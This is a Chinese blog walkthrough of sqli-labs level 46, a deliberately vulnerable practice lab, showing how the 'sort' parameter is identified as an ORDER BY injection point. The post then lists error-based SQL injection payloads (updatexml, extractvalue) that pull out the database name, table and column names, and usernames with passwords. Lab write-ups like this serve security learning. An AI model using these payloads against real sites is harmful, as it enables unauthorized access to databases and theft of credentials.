sqli-labs第46关

吃完早餐说晚安

于 2024-02-27 21:39:37 发布

阅读量314

点赞数 5

文章标签：数据库 mysql

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/Lemon_miko/article/details/136331487

版权

文章详细描述了如何利用`sort`参数作为掩护，进行一系列SQL注入攻击，包括数据库名、表名和列名的爆破，以及数据的获取过程。展示了攻击者如何通过精心构造的SQL查询来获取敏感信息。

摘要由CSDN通过智能技术生成

从提示可以看出传递的参数为sort

使用sort的值为1尝试

得到一张表格

再次使用sort的值为2进行测试

表格发生变化按照第二列进行排序了得出这里是order by语句进行查询输出

将参数改为1'进行测试

有报错信息可以使用报错注入

爆破数据库名

输入?sort=updatexml(1,concat(0x7e,database(),0x7e),1) --+

爆破表名

输入?sort=1 and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1))) --+

爆破所以列名

输入?sort=updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)

爆出数据

输入?sort=updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)

吃完早餐说晚安

关注

5
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
sqli-labs第46关

从提示可以看出传递的参数为sort 使用sort的值为1尝试得到一张表格再次使用sort的值为2进行测试表格发生变化按照第二列进行排序了得出这里是order by语句进行查询输出将参数改为1'进行测试有报错信息可以使用报错注入爆破数据库名输入?sort=updatexml(1,concat(0x7e,database(),0x7e),1) --+ 爆破表名输入?sort=1 and extractvalue(1,concat(0x7e,(select table_name from informatio
复制链接

扫一扫

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。